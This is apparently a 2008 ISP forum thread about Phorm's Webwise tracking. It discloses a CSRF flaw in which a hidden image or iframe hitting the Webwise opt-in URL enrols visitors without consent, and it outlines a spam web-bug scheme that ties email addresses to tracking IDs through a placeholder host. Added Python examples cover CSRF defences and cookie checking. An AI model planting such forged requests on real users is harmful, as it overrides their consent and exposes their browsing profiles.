Possible trivial Phorm opt-in "Exploit" discovered

Mel

0
I was doing a tiny bit of research on Phorm last night and it occurred to me that, as the opt-out is cookie-based, it should be possible to opt-in an unwilling Phorm ISP customer using cross-site request forgery (CSRF).

All that's required is an image link which could be hidden on a webpage or in a forum post or blog etc.

Don't worry, no opt-in images here, but you can download my test page from rapidshare.

Download-Link #1: http://rapidshare.com/files/100013497/Phorm_opt-in_exploit.html

You can check your webwise opt-in/opt-out status here http://webwise.bt.com/webwise/
 
My webwise CSRF page has been temporarily made available at the following url

http://www.toobadcs.co.uk/phorm/Phorm_opt-in_exploit.htm

I haven't made the link clickable so you'll have to copy the exploit URL to your address bar.

Warning: by visiting this page, Webwise will be enabled on your browser.

Don't forget to opt-out afterwards, or delete the a.webwise.net cookie.

If your ISP plans to implement Phorm/Webwise, then I think it might be wise to block the webwise.net domain.

On second thoughts, it might be wiser to choose a better ISP. :)
 
it might be wise to block the webwise.net domain
And, of course, if you're a bit forgetful (who, me? ;)) and have overlooked the fact that you blocked the darned thing about a fortnight ago when the Phorm story surfaced, you will have to temporarily allow it to get Mel's exploit to work in the first place. :rolleyes:

Having done that, yes, it did the job - but just as a minor point, Mel, there's an image top left that isn't showing up, and I don't *think* that's because of anything I've done.
I could be wrong, of course - I usually am. :D
 

That's the exploit, I said it was really trivial to do.

I could make sure the image wasn't visible, but as it is only a demo I couldn't be bothered.

This flaw took me about two minutes to spot, makes me wonder how thorough the security audit was...:shrug:
 
Ah, right - I get it now, I hadn't twigged that it was a "non-image" rather than a "fake image", if you see what I mean, still expected to see something there.
This flaw took me about two minutes to spot
Mmm... doesn't exactly say a lot for the brains behind their system, does it? :hrmph:
 
:nod: Yep, your browser sends an HTTP request to the "image" URL to fetch the image so it can display it, but as it is not actually an image, it doesn't render it.

As the "image" url is in fact for the Webwise opt-in, the webwise server replies with an opt-in cookie, and hey presto you've been press-ganged into Webwise.

There are more sophisticated ways to achieve a CSRF. I've even read it is possible to forge the "referer" header, but given that some popular applications strip "referer" from HTTP requests, checking the referrer would not be a particularly good approach to prevent CSRF.
 
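Mel's point above is that the preference endpoint changes state on any request carrying the cookie, and that a Referer check is a poor fix. The following is an added illustration, not code from this thread or from Phorm: it models a preference endpoint under three policies (cookie presence only, Referer check, and a session-bound synchroniser token) and runs constructed requests through each. The origin name, session id, secret and request contents are all made up for the demo.

```python
# Added illustration (not Mel's page or Phorm's code): three ways an opt-in/opt-out
# endpoint could decide whether a request is genuine, run against constructed requests.
import hashlib
import hmac
from dataclasses import dataclass, field

# Constructed server-side secret; a real deployment would load it from config.
SECRET = b"constructed-demo-secret"
SITE_ORIGIN = "https://optout.example"   # hypothetical origin hosting the preference page


@dataclass
class Request:
    """Just the parts of an HTTP request the policies look at."""
    method: str
    path: str
    cookies: dict = field(default_factory=dict)
    headers: dict = field(default_factory=dict)
    params: dict = field(default_factory=dict)


def csrf_token(session_id: str) -> str:
    """Token derived from the session cookie. A third-party page can make the
    browser send the cookie, but cannot read it or compute this value."""
    return hmac.new(SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def cookie_only_policy(req: Request) -> bool:
    """What the thread describes: hitting the URL is enough, so an <img src=...>
    on any page changes the preference."""
    return req.path.startswith("/services/OO")


def referer_policy(req: Request) -> bool:
    """Accept only if the Referer names our own origin. Weak in both directions:
    a stripped header blocks genuine users, and the value is client-controlled."""
    ref = req.headers.get("Referer")
    return ref is not None and ref.startswith(SITE_ORIGIN + "/")


def token_policy(req: Request) -> bool:
    """Synchroniser token: require POST plus a token bound to the session."""
    if req.method != "POST":
        return False
    session_id = req.cookies.get("session")
    token = req.params.get("csrf")
    if session_id is None or token is None:
        return False
    return hmac.compare_digest(token, csrf_token(session_id))


# Constructed requests. The browser attaches the session cookie in every case,
# which is exactly why cookie presence alone proves nothing about intent.
SESSION = {"session": "constructed-session-id"}

FORGED_IMG = Request("GET", "/services/OO", cookies=dict(SESSION),
                     headers={"Referer": "http://forum.example/some-post"},
                     params={"op": "in"})

GENUINE_NO_REFERER = Request("POST", "/services/OO", cookies=dict(SESSION),
                             headers={},  # privacy proxy removed the Referer header
                             params={"op": "out", "csrf": csrf_token(SESSION["session"])})

GENUINE_WITH_REFERER = Request("POST", "/services/OO", cookies=dict(SESSION),
                               headers={"Referer": SITE_ORIGIN + "/preferences"},
                               params={"op": "out", "csrf": csrf_token(SESSION["session"])})

POLICIES = {"cookie_only": cookie_only_policy,
            "referer": referer_policy,
            "token": token_policy}


def evaluate(req: Request) -> dict:
    """Map each policy name to whether it would let this request change state."""
    return {name: policy(req) for name, policy in POLICIES.items()}


if __name__ == "__main__":
    for label, req in [("forged image request", FORGED_IMG),
                       ("genuine, referer stripped", GENUINE_NO_REFERER),
                       ("genuine, referer present", GENUINE_WITH_REFERER)]:
        print(f"{label:28s} {evaluate(req)}")
```

The cookie-only policy accepts the forged image request; the Referer policy rejects it but also rejects the genuine user whose proxy strips the header; only the token policy gets both cases right, because the token never leaves the first-party page. (In modern browsers the SameSite cookie attribute gives a second, complementary control that did not exist when this thread was written.)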
Just a tiny bit eh Mel? ;)

:nod: I just wanted to see what the opt-out cookie was like and make sure my firewall rules blocked the site, and I happened to look at a javascript.

As webwise is claimed to protect users against phishing, I suppose I should have made my demo "exploit" turn it off, although given browsers come with effective anti-phishing protection built in, I can't see the point :rolleyes:
 
Mel is very good at finding the loopholes for this. It is just annoying that every time I visit the webpage on the clan hosting I have to delete the webwise cookie :) Just using it to get me into a routine to check daily for a webwise cookie before I start to visit websites. :D

It is soo nice to do the search and find none
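For anyone making that daily cookie check a habit, here is an added example (not from this thread or any ISP's software) that parses a cookie export in the Netscape cookies.txt format and reports any cookie scoped to webwise.net or one of its subdomains. The cookie file, cookie names and values are constructed for the demo and are not Webwise's real cookie names.

```python
# Added illustration (not from the thread or any ISP's software): scan an exported
# Netscape-format cookies.txt for cookies scoped to the webwise.net domain.
from datetime import datetime, timezone

# Domains to report; the thread names webwise.net / a.webwise.net.
SUSPECT_DOMAINS = ("webwise.net",)

# Constructed cookie file. Cookie names and values are made up for this demo.
SAMPLE_COOKIES_TXT = """\
# Netscape HTTP Cookie File
.example.co.uk\tTRUE\t/\tFALSE\t1893456000\tsessionid\tabc123
.webwise.net\tTRUE\t/\tFALSE\t1893456000\tdemo_uid\tconstructed-uid-value
#HttpOnly_a.webwise.net\tFALSE\t/services\tFALSE\t1893456000\tdemo_optin\tin
notwebwise.net\tFALSE\t/\tFALSE\t1893456000\tother\tx
"""


def parse_cookies_txt(text: str) -> list:
    """Parse the seven tab-separated fields of a Netscape cookies.txt line:
    domain, include-subdomains flag, path, secure flag, expiry (epoch), name, value.
    curl writes HttpOnly cookies with a '#HttpOnly_' prefix on the domain."""
    cookies = []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#") and not line.startswith("#HttpOnly_"):
            continue  # ordinary comment line
        fields = line.split("\t")
        if len(fields) != 7:
            continue  # malformed line; skip rather than crash on a hand-edited file
        domain, subdomains, path, secure, expiry, name, value = fields
        httponly = domain.startswith("#HttpOnly_")
        if httponly:
            domain = domain[len("#HttpOnly_"):]
        if expiry == "0":
            expires = None  # session cookie
        else:
            try:
                expires = datetime.fromtimestamp(int(expiry), tz=timezone.utc).isoformat()
            except (ValueError, OverflowError, OSError):
                expires = None
        cookies.append({"domain": domain, "subdomains": subdomains == "TRUE",
                        "path": path, "secure": secure == "TRUE",
                        "httponly": httponly, "expires": expires,
                        "name": name, "value": value})
    return cookies


def domain_matches(cookie_domain: str, suspect: str) -> bool:
    """True when the cookie is set for suspect or any of its subdomains.
    A leading dot means 'this domain and subdomains'; strip it before comparing."""
    d = cookie_domain.lstrip(".").lower()
    return d == suspect or d.endswith("." + suspect)


def find_tracking_cookies(text: str, suspects=SUSPECT_DOMAINS) -> list:
    """Return only the parsed cookies whose domain falls under a suspect domain."""
    return [c for c in parse_cookies_txt(text)
            if any(domain_matches(c["domain"], s) for s in suspects)]


if __name__ == "__main__":
    for c in find_tracking_cookies(SAMPLE_COOKIES_TXT):
        print(f"{c['domain']:20s} {c['name']:12s} expires {c['expires']}")
```

Point the function at the text of your own exported cookies.txt instead of the constructed sample; the suffix match deliberately does not treat `notwebwise.net` as a hit, which a naive substring search would.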
 
Actually I've used my router to block it and that page was the perfect place to do the test...
 
Well I used to fix software for a living, but it always helps when they are such blindingly obvious ones :D ;)


There's now another csrf test page on the Dephormation site
http://www.dephormation.org.uk/test_page.html
 
Thought I should provide a webwise "opt-out" link as I've read the BT webwise site's opt-in and opt-out has recently been temporarily disabled until the trial starts.

The following link will fetch a webwise opt-out cookie http://a.webwise.net/services/OO?op=out

If you are unfortunate enough to be with a "phorming" ISP, then unless they provide a proper (total) opt-out that doesn't involve cookies, such as Talk Talk is said to be implementing, your TCP stream will presumably still be intercepted and modified to trick your browser into providing cross-domain access to the webwise cookie, and according to The Register content will still be mirrored to Phorm's system, but you won't have a unique tracking ID.

If anyone wants to provide visitors to their website a Webwise opt-out button, hopefully something like the following code would work.

HTML:
<!-- 1x1 hidden frame takes the navigation so the visitor's page itself doesn't change -->
<iframe name="hidden_iframe" frameborder="0" scrolling="no" height="1" width="1"></iframe><br>
<input type="button" value="Opt into Phorm"
       onclick="frames['hidden_iframe'].location.href='http://a.webwise.net/services/OO?op=in'">
<input type="button" value='"Opt-out" of phorm'
       onclick="frames['hidden_iframe'].location.href='http://a.webwise.net/services/OO?op=out'">
 
or argue away with legal bs
 
BT and Phorm secretly tracked 18,000 customers in 2006

More secret BT trials... I've got shares in BT, perhaps I should be selling them in case the BT share price gets hit by a very large fine?


http://www.theregister.co.uk/2008/04/01/bt_phorm_2006_trial/

Exclusive BT secretly intercepted and profiled the web browsing of 18,000 of its broadband customers in 2006 using advertising technology provided by 121Media, the alleged spyware company that changed its name to Phorm last year.

BT Retail ran the "stealth" pilot without customer consent between 23 September and 6 October 2006. The technology was approved, pending a further trial*.

Documents seen by The Register show that the companies used the secret profiles to target advertising at broadband customers when they visited certain popular websites.

One senior source in the broadband industry we spoke to was appalled by BT's actions. "This is extremely serious," he said. "Data protection errors are generally viewed as a potentially bad thing by the industry, but not a real threat to an ISP's reputation. This seems like a breach of criminal law, which is much, much worse."

Even during the early phase of the BT/Phorm deal that the technical report describes, the pair were preparing to spin the technology to the public. "121Media [Phorm] will take action (both technical and public relations) to avoid any perception that their system is a virus, malware or spyware and to show that in effect it is a positive web development," BT wrote in the report.


Someone on the cableforum pointed out that Phorm is an anagram of morph, so I guess whoever came up with 121media's new name has a sense of humour.
 
Or when they were filling in the form they couldn't think of a suitable name so spelt form wrong, hence phorm... :laugh:
 
Linking email addresses to webwise UID by spamming?

Do any modern email clients still share cookies with a browser? Hmm, I guess webmail services.

Only it occurred to me that by spamming 'everybody'@a_phorming_isp.com with an html email that contained a webbug designed to capture the UID, it might be possible for a spammer to compile a database of UIDs linked to email addresses.

The webbug could be an http: image link containing the email address it was sent to (i.e. your email address), suitably escaped, e.g.:

http://somespammer.con/uidcaptureYourEmailAddress.jpg

If you view the email your client would request the image,

Phorm would use its triple redirect jiggery-pokery to intercept this request and copy the webwise.net UID to a webwise cookie in somespammer's domain.

The spammer's server would reply with a redirect to an https: PHP script, e.g.

https://somespammer.con/uidcaptureYourEmailAddress.php

The client automatically requests the https: url sending the webwise UID cookie.

Using https: bypasses phorm's intercept of the UID cookie, delivering the UID and email address to the spammer.

The spammer then sells a service to websites that allows them to email targeted spam to visitors to their website.
 

Copyright © 1999 to Present - ISPreview.co.uk - All Rights Reserved - Terms  ,  Privacy and Cookie Policy  ,  Links  ,  Website Rules